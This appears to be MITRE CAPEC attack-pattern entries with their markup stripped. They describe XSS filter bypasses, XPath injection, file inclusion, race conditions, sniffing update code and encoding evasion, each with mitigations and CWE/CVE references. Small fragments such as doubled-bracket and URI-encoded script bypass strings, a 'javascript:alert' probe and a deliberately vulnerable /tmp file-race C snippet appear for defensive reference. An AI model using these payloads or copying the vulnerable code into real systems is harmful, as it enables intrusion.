The attacker bypasses input validation by using doubled characters in order to perform a cross-site scripting attack. Some filters fail to recognize dangerous sequences if they are preceded by repeated characters. For example, by doubling the < before a script command, (<<script or %3C%3script using URI encoding) the filters of some web applications may fail to recognize the presence of a script tag. If the targeted server is vulnerable to this type of bypass, the attacker can create a crafted URL or other trap to cause a victim to view a page on the targeted server where the malicious content is executed, as per a normal XSS attack.
The targeted web application does not fully normalize input before checking for prohibited syntax. In particular, it must fail to recognize prohibited methods preceded by certain sequences of repeated characters.
Medium
The attacker must trick the victim into following a crafted link to a vulnerable server or view a web post where the dangerous commands are executed.
Design: Use libraries and templates that minimize unfiltered input.
Implementation: Normalize, filter and sanitize all user supplied fields.
Implementation: The victim should configure the browser to minimize active content from untrusted sources.
79
Targeted
85
Targeted
CVE-2008-2070
The WHM interface 11.15.0 for cPanel 11.18 before 11.18.4 and 11.22 before 11.22.3 allows remote attackers to bypass XSS protection and inject arbitrary script or HTML via repeated, improperly-ordered "<" and ">" characters in the (1) issue parameter to scripts2/knowlegebase, (2) user parameter to scripts2/changeip, (3) search parameter to scripts2/listaccts, and other unspecified vectors.
1000
Attack Pattern
ChildOf
18
Matteo Carli
XSS and CSRF vulnerability on Cpanel
Symantec Connect
SecurityFocus
May 9, 2008
http://www.securityfocus.com/archive/1/archive/1/491864/100/0/threaded
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker injects malicious script to global parameters in a Flash movie via a crafted URL. The malicious script is executed in the context of the Flash movie. As such, this is a form of Cross-Site Scripting (XSS), but the abilities granted to the Flash movie make this attack more flexible.
Spider
Using a browser or an automated tool, an attacker records all instances of Flash movies and verifies that known variables allow for simple XSS.
Use search engines to locate SWF files (Flash movie files) that can be accessed via a URL containing known variable parameters.
env-Web
Use a search engine to locate SWF files on a specific file server.
env-Web
A SWF Flash movie file that is accessed via a URL using a global or known variable has been located, or a potential SWF file on a specific target server has been located.
env-Web
A SWF Flash movie file has not been located.
env-Web
A list of SWF files with the potential for XSS.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Determine the SWF file susceptibility to XSS
Determine the SWF file susceptibility to XSS. For each SWF file identified in the Explore phase, the attacker attempts to use various techniques such as reverse engineering and various XSS attacks to determine the vulnerability of the file.
Compile a list of all variables, both global and specific to the file, that might invoke the getURL function.
env-Web
Test each variable by overwriting the variable amount via the URL, by adding "javascript:" followed by a simple JavaScript command such as "alert('xss')".
env-Web
At least one variable is found susceptible to flash cross-site scripting.
No variable is found susceptible to flash cross-site scripting.
User input must be sanitized according to context before reflected back to the user.
79
Targeted
1000
Attack Pattern
ChildOf
18
1000
Attack Pattern
ChildOf
182
CAPEC Content Team
The MITRE Corporation
2014-06-23
The attacker inserts invalid characters in identifiers to bypass application filtering of input. Filters may not scan beyond invalid characters but during later stages of processing content that follows these invalid characters may still be processed. This allows the attacker to sneak prohibited commands past filters and perform normally prohibited operations. Invalid characters may include null, carriage return, line feed or tab in an identifier. Successful bypassing of the filter can result in a XSS attack, resulting in the disclosure of web cookies or possibly other results.
The target must fail to remove invalid characters from input and fail to adequately scan beyond these characters.
Medium
No special resources are required.
Design: Use libraries and templates that minimize unfiltered input.
Implementation: Normalize, filter and white list any input that will be included in any subsequent web pages or back end operations.
Implementation: The victim should configure the browser to minimize active content from untrusted sources.
79
Targeted
86
Targeted
1000
Attack Pattern
ChildOf
18
CAPEC Content Team
The MITRE Corporation
2014-06-23
The target application must accept input from the user. In virtually all cases, this must be string input.
The target application must fail to adequately filter the user input against the insertion of instructions.
CAPEC Content Team
The MITRE Corporation
2014-06-23
This type of attack exploits terminal devices that allow the keyboard buffer to be written to by other users.
1000
Attack Pattern
ChildOf
248
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack attempts to trigger and exploit a deadlock condition in the target software to cause a denial of service. A deadlock can occur when two or more competing actions are waiting for each other to finish, and thus neither ever does. Deadlock condition are not easy to detect.
The attacker initiates an exploratory phase to get familiar with the system.
The attacker triggers a first action (such as holding a resource) and initiates a second action which will wait for the first one to finish.
If the target program has a deadlock condition, the program waits indefinitely resulting in a denial of service.
The target host has a deadlock condition. There are four conditions for a deadlock to occur, known as the Coffman conditions. [R.25.3][REF-6]
The target host exposes an API to the user.
High
Low
Analysis
API Abuse
An example of a deadlock which may occur in database products is the following. Client applications using the database may require exclusive access to a table, and in order to gain exclusive access they ask for a lock. If one client application holds a lock on a table and attempts to obtain the lock on a second table that is already held by a second client application, this may lead to deadlock if the second application then attempts to obtain the lock that is held by the first application (Source: Wikipedia, http://en.wikipedia.org/wiki/Deadlock)
Medium
This type of attack may be sophisticated and require knowledge about the system's resources and APIs.
The attacker can probe by trying to hold resources and call APIs which are directly using the same resources.
The attacker may try to find actions (threads, processes) competing for the same resources.
Use known algorithm to avoid deadlock condition (for instance non-blocking synchronization algorithms).
For competing actions use well-known libraries which implement synchronization.
Availability
DoS: resource consumption (other)
Denial of Service
412
Secondary
567
Secondary
662
Targeted
1000
Category
ChildOf
172
Exploitation
Low
Low
High
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-412 - Unrestricted Critical Resource Lock
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/412.html
Wikipedia
Deadlock
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Deadlock
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker utilizes crafted XML user-controllable input to probe, attack, and inject data into the XML database, using techniques similar to SQL injection. The user-controllable input can allow for unauthorized viewing of data, bypassing authentication or the front-end application for direct XML database access, and possibly altering database information.
Survey Application
Spider web sites for all available links.
env-Web
Gather results for analysis via responses or network sniffing.
env-ClientServer env-Peer2Peer env-CommProtocol
At least one data input to application identified.
No inputs to application identified, although this does not mean the application will not accept any.
Test user-controllable inputs for injection
Use XML reserved characters or words, possibly with other input data to attempt to cause unexpected results
env-Web
Attacker receives normal response from server.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Attacker receives an error message from server indicating that there was a problem with the SQL query.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException)
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
At least one user-controllable input susceptible to injection found.
No user-controllable input susceptible to injection found.
XML queries used to process user input and retrieve information stored in XML documents
User-controllable input not properly sanitized
High
Injection
Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass.
Low
An attacker must have knowledge of XML syntax and constructs in order to successfully leverage XML Injection
None
The attacker tries to inject characters that can cause an error, such as single-quote (') or equal sign (=), or content that may cause a malformed XML expression. If the injection of such content into the input causes an XPath error and the resulting error is displayed unfiltered, the attacker can begin to determine the nature of input validation and structure of XPath expressions used in queries.
Too many exceptions generated by the application as a result of malformed queries
Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as content that can be interpreted in the context of an XML data or a query.
Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Read application data
User-controllable input used as part of XML queries
XML expressions intended to reveal information or bypass authentication
XML database
The impact of payload activation is that it is interpreted as part of the XPath expression used in the query, thus enabling an attacker to modify the expression used by the query.
91
Targeted
74
Secondary
20
Secondary
390
Secondary
713
Targeted
707
Targeted
1000
Attack Pattern
ChildOf
248
Special characters in user-controllable input must be escaped before use by the application.
Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application or the database.
Reluctance to Trust
Failing Securely
Defense in Depth
Never Use Input as Part of a Directive to any Internal Component
Handle All Errors Safely
Penetration
Exploitation
High
High
Medium
Client-Server
SOA
All
All
All
Common Weakness Enumeration (CWE)
CWE-91 - XML Injection
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/91.html
Common Weakness Enumeration (CWE)
CWE-20 - Input Validation
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/20.html
Common Weakness Enumeration (CWE)
CWE-390 - Improper Error Handling
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/390.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
The attacker forces an application to load arbitrary code files from the local machine. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.
The targeted application must have a bug that allows an attacker to control which code file is loaded at some juncture.
Some variants of this attack may require that old versions of some code files be present and in predictable locations.
Medium
The attacker needs to have enough access to the target application to control the identity of a locally included file. The attacker may also need to be able to upload arbitrary code files to the target machine, although any location for these files may be acceptable.
CVE-2009-0932
Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
1000
Attack Pattern
ChildOf
175
CAPEC Content Team
The MITRE Corporation
2014-06-23
The attacker loads and executes an arbitrary local PHP file on a target machine. The attacker could use this to try to load old versions of PHP files that have known vulnerabilities, to load PHP files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.
The targeted PHP application must have a bug that allows an attacker to control which code file is loaded at some juncture.
Medium
The attacker needs to have enough access to the target application to control the identity of a locally included PHP file.
CVE-2009-0932
Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
1000
Attack Pattern
ChildOf
251
CAPEC Content Team
The MITRE Corporation
2014-06-23
The attacker forces an application to load arbitrary code files from a remote location. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load files that the attacker placed on the remote machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.
1000
Attack Pattern
ChildOf
175
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
CanAlsoBe
228
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends a SOAP request with an array whose actual length exceeds the length indicated in the request. When a data structure including a SOAP array is instantiated, the sender transmits the size of the array as an explicit parameter along with the data. If the server processing the transmission naively trusts the specified size, then an attacker can intentionally understate the size of the array, possibly resulting in a buffer overflow if the server attempts to read the entire data set into the memory it allocated for a smaller array. This, in turn, can lead to a server crash or even the execution of arbitrary code.
The targeted SOAP server must trust that the array size as stated in messages it receives is correct, but read through the entire content of the message regardless of the stated size of the array.
High
The attacker must be able to craft malformed SOAP messages, specifically, messages with arrays where the stated array size understates the actual size of the array in the message.
If the server either verifies the correctness of the stated array size or if the server stops processing an array once the stated number of elements have been read, regardless of the actual array size, then this attack will fail. The former detects the malformed SOAP message while the latter ensures that the server does not attempt to load more data than was allocated for.
1000
Attack Pattern
ChildOf
100
333
Category
HasMember
368
Robin Cover, ed.
XML and Web Services In The News
XML Daily Newslink
http://www.xml.org/xml/news/archives/archive.11292006.shtml
Simple Object Access Protocol (SOAP) 1.1
5.4.2 Arrays
W3C
November 29, 2006
http://www.w3.org/TR/2000/NOTE-SOAP-20000508/#_Toc478383522
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Category
ChildOf
262
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attackers can capture application code bound for an authorized client during a dynamic update and can use it, as-is or through reverse-engineering, to glean sensitive information or exploit the trust relationship between the client and server.
Set up a sniffer
The attacker sets up a sniffer in the path between the server and the client and watches the traffic.
The attacker sets up a sniffer in the path between the server and the client.
env-ClientServer
The attacker successfully sets up a sniffer in the path between the server and client.
The attacker could not set up a sniffer in the path between the server and client.
Check the network interface (e.g., ifconfig/ipconfig) to see whether the network adapter is running in promiscuous mode.
Encrypt all communications between the server and client.
Capturing Application Code Bound During Patching
Attacker knows that the computer/OS/application periodically checks for an available update or that the end user can manually initiate a check for an update, loads the sniffer set up during Explore phase, and extracts the updated code from subsequent communication. The attacker then proceeds to reverse engineer the captured code.
Attacker loads the sniffer to capture the application code bound during a dynamic update.
env-Web
The attacker proceeds to reverse engineer the captured code.
env-All
The attacker can capture the application code bound for the target.
env-Web
The communication between the server and client is encrypted. The attacker may still possible to lift key material from the client.
env-Web
The attacker captures the application code bound for the target and reverse engineers the captured code.
Check the network interface (e.g., ifconfig) to detect the sniffer.
Encrypt all communications between the server and client.
The attacker must be able to employ a sniffer in the path between the server and client without being detected. The targeted application must be configured to periodically check for updates from the server.
Medium
Low
API Abuse
Protocol Manipulation
In the following example, the attacker sets up a sniffer between a victim client and the server. The attacker sniffs the traffic and captures the jar file during patching. The attacker reverse engineers it to gain sensitive information, such as encryption keys, validation algorithms, applications patches, etc.
Medium
The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network.
High
The attacker needs to be able to reverse engineer any binary code captured during an update.
The Attacker needs the ability to capture communications between the client and server during an update. In the case that encryption obscures client/server communication the attacker needs to lift key material from the client.
Design: Encrypt all communication between the client and server.
Implementation: Use SSL, SSH, SCP.
Operation: Use "ifconfig/ipconfig" or other tools to detect the sniffer installed in the network.
Confidentiality
"Varies by context"
Information Leakage
Integrity
Modify files or directories
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
311
Targeted
1000
Attack Pattern
ChildOf
65
Exploitation
Reconnaissance
High
Medium
Low
Client-Server
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attackers can capture application code bound for an authorized client during patching and can use it, as-is or through reverse-engineering, to glean sensitive information or exploit the trust relationship between the client and server.
Set up a sniffer
The attacker sets up a sniffer in the path between the server and the client and watches the traffic.
The attacker sets up a sniffer in the path between the server and the client.
env-ClientServer
The attacker successfully sets up a sniffer in the path between the server and client.
The attacker could not set up a sniffer in the path between the server and client.
Check the network interface (e.g., ifconfig/ipconfig) to see whether the network adapter is running in promiscuous mode.
Encrypt all communications between the server and client.
Capturing Application Code Bound During Patching
Attacker receives notification that the computer/OS/application has an available update for patching, loads the sniffer set up during Explore phase, and extracts patching code from subsequent communication. The attacker then proceeds to reverse engineer the captured code.
Attacker loads the sniffer to capture the application code bound during patching.
env-Web
The attacker proceeds to reverse engineer the captured code.
env-All
The attacker can capture the application code bound for the target.
env-Web
The communication between the server and client is encrypted. The attacker may still possible to lift key material from the client.
env-Web
The attacker captures the application code bound for the target and reverse engineers the captured code.
Check the network interface (e.g., ifconfig) to detect the sniffer.
Encrypt all communications between the server and client.
The attacker must be able to employ a sniffer in the path between the server and client without being detected. The targeted application must receive some patches from the server.
Medium
Low
API Abuse
Protocol Manipulation
In the following example, the attacker sets up a sniffer between a victim client and the server www.server.com. The attacker sniffs the traffic and captures the jar file during patching. The attacker reverse engineers it to gain sensitive information, such as encryption keys, validation algorithms and such.
Medium
The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network.
High
The attacker needs to reverse engineer the binary code if the need be.
The Attacker needs the ability to capture communications between the client and server during patching. In the case that encryption obscures client/server communication the attacker needs to lift key material from the client.
Design: Encrypt all communication between the client and server.
Implementation: Use SSL, SSH, SCP.
Operation: Use "ifconfig/ipconfig" or other tools to detect the sniffer installed in the network.
Confidentiality
"Varies by context"
Information Leakage
Integrity
Modify files or directories
Confidentiality
Read files or directories
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
311
Targeted
1000
Attack Pattern
ChildOf
65
http://capec.mitre.org/data/definitions/65.html
Exploitation
Reconnaissance
High
Medium
Low
Client-Server
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack targets a race condition occurring when multiple processes access and manipulate the same resource concurrently and the outcome of the execution depends on the particular order in which the access takes place. The attacker can leverage a race condition by "running the race", modifying the resource and modifying the normal execution flow. For instance a race condition can occur while accessing a file, the attacker can trick the system by replacing the original file with his version and cause the system to read the malicious file.
The attacker explores to gauge what level of access he has.
The attacker gains access to a resource on the target host. The attacker modifies the targeted resource. The resource's value is used to determine the next normal execution action.
The resource is modified/checked concurrently by multiple processes. By using one of the processes, the attacker is able to modify the value just before it is consumed by a different process. A race condition occurs and is exploited by the Attacker to abuse the target host.
A resource is accessed/modified concurrently by multiple processes such that a race condition exists.
The attacker has the ability to modify the resource.
High
High
Time and State
Modification of Resources
The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client.
CVE-2007-1057
The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an attacker can replace the file referenced by the name.
include <sys/types.h>
include <fcntl.h>
include <unistd.h>
define FILE "/tmp/myfile"
define UID 100
void test(char *str)
{
int fd;
fd = creat(FILE, 0644);
if(fd == -1)
return;
chown(FILE, UID, -1); /* BAD */
close(fd);
}
int main(int argc, char **argv)
{
char *userstr;
if(argc > 1) {
userstr = argv[1];
test(userstr);
}
return 0;
}
[R.26.5]
Medium
Vulnerability testing tool can be used to probe for race condition.
The attacker may also look for temporary file creation. The attacker may tries to replace them and take advantage of a race condition.
Use safe libraries to access resources such as files.
Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition.
Use synchronization to control the flow of execution.
Use static analysis tools to find race conditions.
Pay attention to concurrency problems related to the access of resources.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Integrity
Modify application data
368
Secondary
363
Secondary
366
Secondary
370
Secondary
362
Secondary
662
Targeted
689
Targeted
667
Targeted
665
Secondary
1000
Category
ChildOf
172
Exploitation
Low
High
Medium
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-362 - Race Conditions
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/362.html
Wikipedia
Race condition
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Race_condition
David Wheeler
Secure programmer: Prevent race conditions
IBM developerWorks
IBM
http://www.ibm.com/developerworks/linux/library/l-sprace/index.html
Fortify Software
SAMATE - Software Assurance Metrics And Tool Evaluation
Test Case ID 1598
National Institute of Standards and Technology (NIST)
2006-06-22
http://samate.nist.gov/SRD/view_testcase.php?tID=1598
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attackers can capture new application installation code bound for an authorized client during initial distribution and can use it, as-is or through reverse-engineering, to glean sensitive information or exploit the trust relationship between the client and server.
Set up a sniffer
The attacker sets up a sniffer in the path between the server and the client and watches the traffic.
The attacker sets up a sniffer in the path between the server and the client.
env-ClientServer
The attacker successfully sets up a sniffer in the path between the server and client.
The attacker could not set up a sniffer in the path between the server and client.
Check the network interface (e.g., ifconfig/ipconfig) to see whether the network adapter is running in promiscuous mode.
Encrypt all communications between the server and client.
Capturing Application Code Bound During Patching
Attacker knows that the computer/OS/application can install additional components or full applications as requested by the user, loads the sniffer set up during Explore phase, and extracts the downloaded code from subsequent communication. The attacker then proceeds to reverse engineer the captured code and the communication protocols used.
Attacker loads the sniffer to capture the application code bound during an initial installation.
env-Web
The attacker proceeds to reverse engineer the captured code.
env-All
The attacker can capture the application code bound for the target.
env-Web
The communication between the server and client is encrypted. The attacker may still possible to lift key material from the client.
env-Web
The attacker captures the application code bound for the target and reverse engineers the captured code.
Check the network interface (e.g., ifconfig) to detect the sniffer.
Encrypt all communications between the server and client.
The attacker must be able to employ a sniffer in the path between the server and client without being detected. The targeted operating system or application must be configured to allow for end users to request new components and applications from the server.
Medium
Low
API Abuse
Protocol Manipulation
In the following example, the attacker sets up a sniffer between a victim client and the server. The attacker sniffs the traffic and captures the installation of a new application. The attacker reverse engineers the traffic to gain sensitive information, such as encryption keys, validation algorithms, etc. Additionally the attacker now knows specific version information regarding an installed application on the victim client, and may use this information in subsequent social engineering or direct application attack.
Medium
The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network.
High
The attacker needs to be able to reverse engineer any binary code captured during an initial installation.
The Attacker needs the ability to capture communications between the client and server during an initial installation. In the case that encryption obscures client/server communication the attacker needs to lift key material from the client.
Design: Encrypt all communication between the client and server.
Implementation: Use SSL, SSH, SCP.
Operation: Use "ifconfig/ipconfig" or other tools to detect the sniffer installed in the network.
Confidentiality
"Varies by context"
Information Leakage
Integrity
Modify files or directories
Confidentiality
Read files or directories
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
311
Targeted
1000
Attack Pattern
ChildOf
65
Exploitation
Reconnaissance
High
Medium
Low
Client-Server
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker who is authorized to send queries to a target sends variants of expected queries in the hope that these modified queries might return information (directly or indirectly through error logs) beyond what the expected set of queries should provide. Many client applications use specific query templates when interacting with a server and often automatically fill in specific fields or attributes. For example, a client that queries an employee database might have templates such that the user only supplies the target's name and the template dictates the fields to be returned (location, position in the company, phone number, etc.). If the server does not verify that the query matches one of the expected templates, an attacker who is allowed to send normal queries could modify their query to try to return additional information. In the above example, additional information might include social security numbers or salaries. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. In this particular attack, the fuzzing is applied to the format of the expected templates, creating variants that request additional information, exclude limiting clauses, or alter fields that identify the requester in order to subvert access controls. The attacker may not know the names of fields to request or how other modifications will affect the server response, but by attempting multiple plausible variants, they might eventually trigger a server response that divulges sensitive information. Other possible outcomes include server crashes and resource consumption if the unexpected queries cause the server to enter an unstable state or perform excessive computation.
The server must assume that the queries it receives follow specific templates and/or have fields or attributes that follow specific procedures. The server must process queries that it receives without adequately checking or sanitizing queries to ensure they follow these templates.
Medium
The attacker must have sufficient privileges to send queries to the targeted server. A normal client might limit the nature of these queries, so the attacker must either have a modified client or their own application which allows them to modify the expected queries.
1000
Attack Pattern
ChildOf
545
CAPEC Content Team
The MITRE Corporation
2014-06-23
This describes an attack where an application is forced to use a file that an attacker has corrupted. The result is often a denial of service caused by the application being unable to process the corrupted file, but other results, including the disabling of filters or access controls (if the application fails in an unsafe way rather than failing by locking down) or buffer overflows are possible.
The targeted application must utilize a configuration file that an attacker is able to corrupt. In some cases, the attacker must be able to force the (re-)reading of the corrupted file if the file is normally only consulted at startup.
The severity of the attack hinges on how the application responds to the corrupted file. If the application detects the corruption and locks down, this may result in the denial of services provided by the application. If the application fails to detect the corruption, the result could be a more severe denial of service (crash or hang) or even an exploitable buffer overflow. If the application detects the corruption but fails in an unsafe way, this attack could result in the continuation of services but without certain security structures, such as filters or access controls. For example, if the corrupted file configures filters, an unsafe response from an application could result in simply disabling the filtering mechanisms due to the lack of usable configuration data.
Medium
This varies depending on the resources necessary to corrupt the configuration file and the resources needed to force the application to re-read it (if any).
1000
Attack Pattern
ChildOf
165
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates environment variables used by an application to perform a variety of possible attacks. Changing variable values is usually undertaken as part of another attack; for example, a path traversal (inserting relative path modifiers) or buffer overflow (enlarging a variable value beyond an application's ability to store it).
The targeted application must rely on external variables in such a way that malicious manipulation of them can subvert functionality.
The attacker must be able to manipulate the targeted environment variables, either at runtime or by accessing a configuration file or manipulating start-up values.
Design: Ensure that variables that should not be manipulated by a user are not accessible to them.
471
Targeted
20
Targeted
1000
Attack Pattern
ChildOf
171
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates global variables used by an application to perform a variety of possible attacks. Changing variable values is usually undertaken as part of another attack; for example, a path traversal (inserting relative path modifiers) or buffer overflow (enlarging a variable value beyond an application's ability to store it).
The targeted application must rely on external variables in such a way that malicious manipulation of them can subvert functionality.
The attacker must be able to manipulate the targeted global variables, either at runtime or by accessing a configuration file or manipulating start-up values.
Design: Range, size and value and consistency verification for any arguments supplied to application from external sources and devise appropriate error response.
Design: Ensure that variables that should not be manipulated by a user are not accessible to them.
471
Targeted
20
Targeted
1000
Attack Pattern
ChildOf
171
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Attack Pattern
ChildOf
153
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack leverages the possibility to encode potentially harmful input and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult.
Survey the application for user-controllable inputs
Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
env-Web
Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
env-Web
Manually inspect the application to find entry points.
env-All
Inputs are used by the application or the browser (DOM)
env-All env-Web
Using URL rewriting, parameters may be part of the URL path.
env-Web
No parameters appear to be used by the application. Even though none appear, the application may still use them if they are provided.
env-Web
No inputs seem to be used by the application. They might still be provided to another component (web service, database, system call, etc.).
env-All env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list of entry points (URL, parameters, configuration files, etc.) is created by the attacker.
A list of resources accessed by the application is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Probe entry points to locate vulnerabilities
The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various payloads using a variety of different types of encodings to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.
Try to use different encodings of content in order to bypass validation routines.
env-All env-Web
The application accepts user-controllable input.
env-All env-Web
The attacker's encoded payload is processed and acted on by the application without filtering or transcoding.
The application decodes the charset and filters the inputs.
Monitor inputs to web servers. Alert on unusual charset and/or characters.
Implement input validation routines that canonicalize and filter user submitted content.
Specify the charset of the HTTP transaction/content.
Actively monitor the application and either deny or redirect requests from origins that appear to be attack attempts.
The application's decoder accepts and interprets encoded characters. Data canonicalization, input filtering and validating is not done properly leaving the door open to harmful characters for the target host.
High
High
Injection
Protocol Manipulation
API Abuse
Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 does not properly handle unspecified "encoding strings," which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site, aka "Post Encoding Information Disclosure Vulnerability." Related Vulnerabilities CVE-2010-0488
Low
An attacker can inject different representation of a filtered character in a different encoding.
Medium
An attacker may craft subtle encoding of input data by using the knowledge that he/she has gathered about the target host.
Attacker may try to inject dangerous characters using different encoding using (example of invalid UTF-8 characters, overlong UTF-8, Chinese characters in Big-5, etc.). The attacker hopes that the targeted system does poor input filtering for all the different possible representations of the malicious characters. Malicious inputs can be sent through an HTML form, directly encoded in the URL or as part of a database query. The attacker can use scripts or automated tools to probe for poor input filtering.
Assume all input might use an improper representation. Use canonicalized data inside the application; all data must be converted into the representation used inside the application (UTF-8, UTF-16, etc.)
Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Test your decoding process against malicious input.
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read memory
Integrity
Modify memory
Confidentiality
Read application data
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
Availability
DoS: amplification
DoS: crash / exit / restart
DoS: instability
DoS: resource consumption (CPU)
DoS: resource consumption (memory)
DoS: resource consumption (other)
Denial of Service
173
Targeted
172
Targeted
180
Targeted
181
Targeted
171
Secondary
73
Targeted
21
Targeted
74
Secondary
20
Secondary
697
Targeted
692
Targeted
1000
Attack Pattern
ChildOf
153
http://capec.mitre.org/data/definitions/18.html
Reluctance to Trust
Penetration
High
High
Medium
Client-Server
n-Tier
All
All
All
WASC Threat Classification 2.0
WASC-20 - Improper Input Handling
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Improper-Input-Handling
OWASP
Category: Encoding
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Category:Encoding
OWASP
Canonicalization, locale and Unicode
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Canonicalization,_locale_and_Unicode
OWASP
XSS (Cross Site Scripting) Prevention Cheat Sheet
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
David Wheeler
Secure Programming for Linux and Unix HOWTO
Chapter 5 Section 9: Character Encoding
http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/character-encoding.html
Wikipedia
Character encoding
The Wikimedia Foundation, Inc
http://en.wikipedia.org/wiki/Character_encoding
Eric Hacker
IDS Evasion with Unicode
January 3, 2001
http://www.securityfocus.com/infocus/1232
CAPEC Content Team
The MITRE Corporation
2014-06-23
